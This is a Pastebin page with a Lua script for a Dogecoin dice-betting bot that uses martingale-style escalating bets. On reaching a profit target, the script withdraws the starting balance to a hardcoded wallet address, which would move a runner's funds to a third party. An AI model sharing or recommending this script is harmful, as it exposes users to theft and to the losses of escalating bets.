Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- chance = 90
- bethigh = true
- basebet = balance/6000
- nextbet = basebet
- amount=balance
- profittarget=100000
- stoptarget=0
- function dobet()
- if (win) then
- chance = 90
- basebet = balance/6000
- nextbet = basebet/3.3
- else
- if chance == 66.00 then
- nextbet = previousbet * 4
- else
- chance = 66.00
- nextbet = basebet
- print("-----------------------------------------")
- print(" ")
- print("profit") print(profit) print("profit")
- print(" ")
- print("Balance") print(balance)
- print(" ")
- print("-----------------------------------------")
- resetseed();
- end
- end
- if balance <= stoptarget then
- stop()
- end
- if (balance) >= profittarget then
- ching()
- alarm()
- print("Balance ") print(balance)
- print(" ")
- print("TARGET made!!!")
- print(" ")
- print("TARGET made!!!")
- print(" ")
- print("TARGET made!!!")
- print(" ")
- print("TARGET made!!!")
- print(" ")
- print("profit ") print(profit) print(" profit")
- print(" ")
- print("Withdrawing Target Amount ") print(amount) print(" DOGE")
- withdraw(amount,"DPAw6ei7USy7ecuhQ6pxGGfGivrNDqARXg")
- print(" ")
- print("you have it withdrawn BRO!!!")
- resetseed();
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement